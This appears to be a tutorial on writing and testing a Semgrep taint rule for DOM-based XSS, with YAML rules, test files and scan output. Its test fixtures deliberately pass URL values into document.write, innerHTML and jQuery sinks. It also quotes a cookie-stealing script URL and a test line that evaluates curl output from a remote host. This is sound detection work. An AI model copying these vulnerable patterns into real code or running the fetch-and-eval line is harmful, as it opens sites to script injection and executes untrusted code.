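Writing a Semgrep rule to detect DOM-XSS
First, check whether the Registry already has a suitable rule.
Found one that looks close.
Let's use this rule as a base.
To do
- Write test code
- Switch to taint mode so findings are detected as source-to-sink flows
- Add more sources and sinks to improve coverage
The test code is also based on the one in the repository.
Modify the test to cover the case where window.location is the source.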
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
Run the rule against the original test code.
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Ran 1 rule on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to
construct an element added directly to the page. For example, a malicious actor could send
someone a link like this:
http://www.some.site/page.html?default=<script>alert(document.cookie)</script> which would
add the script to the page. Consider allowlisting appropriate values or using an approach
which does not involve the URL.
2┆ document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
Ran 1 rule on 1 file: 1 finding.
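To make the finding above concrete, the sketch below evaluates the same string expression as the flagged line outside a browser. The helper names `extractDefault` and `pickAllowedDefault` and the allowlist values are hypothetical; the URL is the one quoted in the rule message. The URL is passed in as a plain string here, whereas a real browser may percent-encode parts of it, so this only illustrates the data flow and the allowlisting idea the message suggests.

```javascript
// Hypothetical helper: same expression as the flagged line, with the URL as a parameter.
function extractDefault(href) {
  return href.substring(href.indexOf("default=") + 8);
}

// Hypothetical allowlist variant, following the advice in the rule message.
function pickAllowedDefault(href, allowed) {
  const value = extractDefault(href);
  return allowed.includes(value) ? value : allowed[0];
}

const href =
  "http://www.some.site/page.html?default=<script>alert(document.cookie)</script>";

// Unfiltered: the script tag from the URL ends up inside the markup.
const unsafeHtml = "<OPTION value=1>" + extractDefault(href) + "</OPTION>";
console.log(unsafeHtml);

// Allowlisted: anything unexpected falls back to the first allowed value.
const safeHtml =
  "<OPTION value=1>" + pickAllowedDefault(href, ["English", "French"]) + "</OPTION>";
console.log(safeHtml);
```

With the allowlist in place, the value taken from the URL can only ever be one of the listed strings, which is why the flow stops being dangerous even though the source is still attacker-controlled.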
Run it against the modified test code. Confirmed that nothing is detected.
$ semgrep --config dom-based-xss.yaml dom-based-xss2.js
Scanning 1 file.
Ran 1 rule on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
The metadata gets in the way while reworking the rule, so remove it.
rules:
  - id: dom-based-xss
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-either:
      - pattern: document.write(<... document.location.$W ...>)
      - pattern: document.write(<... location.$W ...>)
Switch to taint mode and write the source and the sink.
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern: window.location
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
Run it. Detected!
$ semgrep --config dom-based-xss.yaml dom-based-xss2.js
Scanning 1 file.
Findings:
dom-based-xss2.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
Ran 1 rule on 1 file: 2 findings
Next I want to add more sources. What could act as a source for DOM-XSS?
Found a list of the main sinks. Maybe start with the sinks instead.
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern: window.location
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: element.innerHTML = $PAYLOAD
          - pattern: element.outerHTML = $PAYLOAD
Test code
const qs = window.location.search;
const hash = window.location.hash
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
const element = document.createElement('p');
// ng
element.innerHTML = qs;
// ng
element.innerHTML = hash;
// ok
element.innerHTML = "test"
element.innerHTML = "test" was reported as a false positive. Why?
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
15┆ element.innerHTML = qs;
⋮┆----------------------------------------
18┆ element.innerHTML = hash;
⋮┆----------------------------------------
21┆ element.innerHTML = "test"
Ran 1 rule on 1 file: 5 findings.
const qs = window.location.search;
const hash = window.location.hash
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const element = document.createElement('p');
// ng
element.innerHTML = qs;
// ng
element.innerHTML = hash;
// ok
element.innerHTML = "test"
// ok
element.innerHTML = "test2"
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
15┆ element.innerHTML = qs;
⋮┆----------------------------------------
18┆ element.innerHTML = hash;
⋮┆----------------------------------------
21┆ element.innerHTML = "test"
Ran 1 rule on 1 file: 5 findings.
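"test2" is not reported. Is element.innerHTML perhaps still treated as tainted at line 21?
After changing the test to use a separate element for each case (e1, e2, e3), the innerHTML cases are no longer detected at all. Why?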
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
Ran 1 rule on 1 file: 2 findings.
The element name in the rule was a literal, not a metavariable. Fixed.
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern: window.location
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
Good.
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
Ran 1 rule on 1 file: 4 findings.
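The difference between `element.innerHTML = $PAYLOAD` and `$ELEMENT.innerHTML = $PAYLOAD` can be modelled with a small text-based matcher. This is only a toy: Semgrep matches on syntax trees, not on strings, and the function names `patternToRegExp` and `matches` are made up for this sketch. It just shows that a literal name matches one variable, while a metavariable matches any.

```javascript
// Toy, text-based stand-in for pattern matching. Semgrep itself matches on
// syntax trees, so this only models "literal name" versus "metavariable".
function patternToRegExp(pattern) {
  // Escape regex special characters so the pattern is taken literally.
  const escaped = pattern.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  // After escaping, a metavariable such as $ELEMENT reads "\$ELEMENT";
  // turn each one into a wildcard group.
  const withWildcards = escaped.replace(/\\\$[A-Z_][A-Z0-9_]*/g, "(.+?)");
  return new RegExp("^" + withWildcards + ";?$");
}

function matches(pattern, statement) {
  return patternToRegExp(pattern).test(statement);
}

// Literal "element" does not match a variable named e1.
console.log(matches("element.innerHTML = $PAYLOAD", "e1.innerHTML = qs;"));
// The metavariable $ELEMENT matches any receiver.
console.log(matches("$ELEMENT.innerHTML = $PAYLOAD", "e1.innerHTML = qs;"));
```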
Let's add a few jQuery sinks as well. For now, add() and html().
Add test cases
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
Add them to the rule too
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern: window.location
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
Detected as expected.
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
Ran 1 rule on 1 file: 6 findings.
Now I want more sources.
Found an interesting article.
Let's borrow the list from there.
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern-either:
          - pattern: location
          - pattern: document.URL
          - pattern: window.name
          - pattern: document.referrer
          - pattern: document.documentURI
          - pattern: document.baseURI
          - pattern: document.cookie
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const e1 = document.createElement('p');
e1.innerHTML = qs;
// ng
const e2 = document.createElement('p');
e2.innerHTML = hash;
// ok
const e3 = document.createElement('p');
e3.innerHTML = "test"
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
// ng
const referer = document.referrer
$("div.test").add(referer.substring(1,2))
The newly added source is detected, but the cases that worked before are now missed.
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
34┆ $("div.test").add(referer.substring(1,2))
Ran 1 rule on 1 file: 1 finding.
Probably because the pattern location does not match window.location. Makes sense.
After fixing the rule, it worked.
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern-either:
          - pattern: location
          - pattern: window.location
          - pattern: document.location
          - pattern: document.URL
          - pattern: window.name
          - pattern: document.referrer
          - pattern: document.documentURI
          - pattern: document.baseURI
          - pattern: document.cookie
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
⋮┆----------------------------------------
34┆ $("div.test").add(referer.substring(1,2))
Ran 1 rule on 1 file: 7 findings.
Is it still detected if the code does something like this?
const searchParams = new URLSearchParams(window.location.search)
const firstname = searchParams.get('firstname')
$("div.test").add(firstname)
Detected.
39┆ $("div.test").add(firstname)
const names = [searchParams.get('firstname'), searchParams.get('lastname')]
$("div.test").add(names.join(' '))
Impressive.
43┆ $("div.test").add(names.join(' '))
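These two findings are true positives because the value really does survive `URLSearchParams.get()` and `join()`. The sketch below shows this in Node.js, where `URLSearchParams` is available as a global. The query string is a made-up stand-in for `window.location.search`.

```javascript
// Hypothetical query string standing in for window.location.search.
const search =
  "?firstname=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E&lastname=Doe";

const searchParams = new URLSearchParams(search);

// Same shape as the test case: collect values into an array, then join.
const names = [searchParams.get("firstname"), searchParams.get("lastname")];
const joined = names.join(" ");

// URLSearchParams decodes percent-encoding, so the markup is back in plain form.
console.log(joined);
```

Because the decoded markup reaches the final string unchanged, passing it to an HTML sink such as `.add()` or `.html()` is exactly the flow the rule is meant to report.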
Found a pattern that is not detected.
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").add(arr.join(' '))
So arr is not considered tainted.
I want to be able to detect this pattern.
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").html(arr.join(' '))
The result
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern-either:
          - pattern: location
          - pattern: window.location
          - pattern: document.location
          - pattern: document.URL
          - pattern: window.name
          - pattern: document.referrer
          - pattern: document.documentURI
          - pattern: document.baseURI
          - pattern: document.cookie
    pattern-propagators:
      - pattern: $S.push($E)
        from: $E
        to: $S
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
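Why `arr.push(...)` needs the `pattern-propagators` entry can be illustrated with a toy taint tracker. This is not Semgrep's implementation; the step format, the function name `findTaintedSinks` and the `propagatePush` flag are all invented for this sketch. The idea it models: taint follows assignments by default, but `push` changes `arr` as a side effect without assigning to it, so the flow is only seen when a rule says "taint goes from the argument to the receiver".

```javascript
// Toy taint tracker over a flat list of steps. NOT Semgrep's algorithm,
// only a model of "assignment propagates, side effects need a propagator".
function findTaintedSinks(steps, { propagatePush }) {
  const tainted = new Set();
  const hits = [];
  for (const step of steps) {
    switch (step.op) {
      case "source": // target = <value from a taint source>
        tainted.add(step.target);
        break;
      case "assign": // target = f(from): taint follows the assignment
        if (tainted.has(step.from)) tainted.add(step.target);
        else tainted.delete(step.target);
        break;
      case "push": // target.push(from): a side effect, no assignment
        if (propagatePush && tainted.has(step.from)) tainted.add(step.target);
        break;
      case "sink": // sink(arg)
        if (tainted.has(step.arg)) hits.push(step.line);
        break;
    }
  }
  return hits;
}

// Models: firstname = searchParams.get(...); arr = []; arr.push(firstname);
//         joined = arr.join(' '); $(...).html(joined)
const steps = [
  { op: "source", target: "firstname" },
  { op: "assign", target: "arr", from: "emptyArrayLiteral" },
  { op: "push", target: "arr", from: "firstname" },
  { op: "assign", target: "joined", from: "arr" },
  { op: "sink", arg: "joined", line: 5 },
];

console.log(findTaintedSinks(steps, { propagatePush: false })); // no hit
console.log(findTaintedSinks(steps, { propagatePush: true })); // hit at step line 5
```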
Test code
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const e1 = document.createElement('p');
e1.innerHTML = qs;
// ng
const e2 = document.createElement('p');
e2.innerHTML = hash;
// ok
const e3 = document.createElement('p');
e3.innerHTML = "test"
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
// ng
const referer = document.referrer
$("div.test").add(referer.substring(1,2))
// ng
const searchParams = new URLSearchParams(window.location.search)
const firstname = searchParams.get('firstname')
$("div.test").add(firstname)
// ng
const names = [searchParams.get('firstname'), searchParams.get('lastname')]
$("div.test").add(names.join(' '))
// ng
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").html(arr.join(' '))
Output
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
⋮┆----------------------------------------
34┆ $("div.test").add(referer.substring(1,2))
⋮┆----------------------------------------
39┆ $("div.test").add(firstname)
⋮┆----------------------------------------
43┆ $("div.test").add(names.join(' '))
⋮┆----------------------------------------
49┆ $("div.test2").html(arr.join(' '))
Ran 1 rule on 1 file: 10 findings.
Apparently JavaScript embedded in HTML is not detected.
<html>
<body>
<script>
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
</script>
</body>
</html>
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Nothing to scan.
Ran 1 rule on 0 files: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
Maybe it can be done?
Something like this?
- id: extract-html-to-javascript
  mode: extract
  languages:
    - html
  pattern: <script ...>$...SCRIPT</script>
  extract: $...SCRIPT
  dest-language: javascript
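Conceptually, the extract rule pulls the text between the script tags out of the HTML and hands it to the JavaScript rules. The sketch below mimics that step with a regular expression. It is a rough illustration only: the function name `extractInlineScripts` is hypothetical, Semgrep does not work this way internally, and a regex is not a robust way to parse HTML.

```javascript
// Rough illustration of "take the body of each <script> element".
// A regex is used for brevity; it is not a reliable HTML parser.
function extractInlineScripts(html) {
  const scriptElement = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  return [...html.matchAll(scriptElement)].map((match) => match[1]);
}

// Shortened version of the HTML test file.
const html = [
  "<html>",
  "<body>",
  "<script>",
  "const qs = window.location.search;",
  "document.write(qs);",
  "</script>",
  "</body>",
  "</html>",
].join("\n");

const scripts = extractInlineScripts(html);
console.log(scripts.length);
console.log(scripts[0].trim());
```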
No good.
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Scanning 1 file.
Ran 2 rules on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
The pattern itself does not seem to be wrong.
rules:
  - id: extract-html-to-javascript
    languages:
      - html
    pattern: <script>$...SCRIPT</script>
    message: test
    severity: INFO
$ semgrep --config html.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
extract-html-to-javascript
test
3┆ <script>
4┆ const qs = window.location.search;
5┆ const hash = window.location.hash;
6┆
7┆ // ruleid:dom-based-xss
8┆ document.write(qs);
9┆ document.write(hash);
10┆
11┆ // ok:dom-based-xss
12┆ document.write("<OPTION value=2>English</OPTION>");
[hid 1 additional lines, adjust with --max-lines-per-finding]
Ran 1 rule on 1 file: 1 finding.
Maybe it's the order of the rules.
rules:
  - id: curl-eval
    severity: WARNING
    languages:
      - bash
    message: Evaluating data from a `curl` command is unsafe.
    mode: taint
    pattern-sources:
      - pattern: |
          $(curl ...)
      - pattern: |
          `curl ...`
    pattern-sinks:
      - pattern: eval ...
  - id: extract-docker-run-to-bash
    mode: extract
    languages:
      - dockerfile
    pattern: RUN $...CMD
    extract: $...CMD
    dest-language: bash
  - id: extract-python-os-system-to-bash
    mode: extract
    languages:
      - python
    pattern: os.system("$CMD")
    extract: $CMD
    dest-language: bash
$ semgrep --config _extract-test.yaml _extract-test.py
Scanning 1 file.
Findings:
_extract-test.py
curl-eval
Evaluating data from a `curl` command is unsafe.
3┆ if system('eval `curl -s "http://www.very-secure-website.net"`'):
Ran 3 rules on 1 file: 1 finding.
rules:
  - id: extract-docker-run-to-bash
    mode: extract
    languages:
      - dockerfile
    pattern: RUN $...CMD
    extract: $...CMD
    dest-language: bash
  - id: extract-python-os-system-to-bash
    mode: extract
    languages:
      - python
    pattern: os.system("$CMD")
    extract: $CMD
    dest-language: bash
  - id: curl-eval
    severity: WARNING
    languages:
      - bash
    message: Evaluating data from a `curl` command is unsafe.
    mode: taint
    pattern-sources:
      - pattern: |
          $(curl ...)
      - pattern: |
          `curl ...`
    pattern-sinks:
      - pattern: eval ...
$ semgrep --config _extract-test.yaml _extract-test.py
Scanning 1 file.
Ran 3 rules on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
Does the extract rule have to come after the other rules?
It worked!!
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern-either:
          - pattern: location
          - pattern: window.location
          - pattern: document.location
          - pattern: document.URL
          - pattern: window.name
          - pattern: document.referrer
          - pattern: document.documentURI
          - pattern: document.baseURI
          - pattern: document.cookie
    pattern-propagators:
      - pattern: $S.push($E)
        from: $E
        to: $S
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
  - id: extract-html-to-javascript
    mode: extract
    languages:
      - html
    pattern: <script>$...SCRIPT</script>
    extract: $...SCRIPT
    dest-language: javascript
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
In practice it seems best to keep the extract rule in a separate file and specify the order on the command line.
$ semgrep --config dom-based-xss.yaml --config extract-html-to-javascript.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
The result
dom-based-xss.yaml
rules:
  - id: dom-based-xss
    mode: taint
    message: dom-xss
    languages:
      - javascript
      - typescript
    severity: ERROR
    pattern-sources:
      - pattern-either:
          - pattern: location
          - pattern: window.location
          - pattern: document.location
          - pattern: document.URL
          - pattern: window.name
          - pattern: document.referrer
          - pattern: document.documentURI
          - pattern: document.baseURI
          - pattern: document.cookie
    pattern-propagators:
      - pattern: $S.push($E)
        from: $E
        to: $S
    pattern-sinks:
      - pattern-either:
          - pattern: document.write(...)
          - pattern: document.writeln(...)
          - pattern: document.domain = $PAYLOAD
          - pattern: $ELEMENT.innerHTML = $PAYLOAD
          - pattern: $ELEMENT.outerHTML = $PAYLOAD
          - pattern: $JQ.add($PAYLOAD)
          - pattern: $JQ.html($PAYLOAD)
extract-html-to-javascript.yaml
rules:
  - id: extract-html-to-javascript
    mode: extract
    languages:
      - html
    pattern: <script>$...SCRIPT</script>
    extract: $...SCRIPT
    dest-language: javascript
Test data
<html>
<body>
<script>
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
</script>
</body>
</html>
Output
$ semgrep --config dom-based-xss.yaml --config extract-html-to-javascript.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
I put it on GitHub.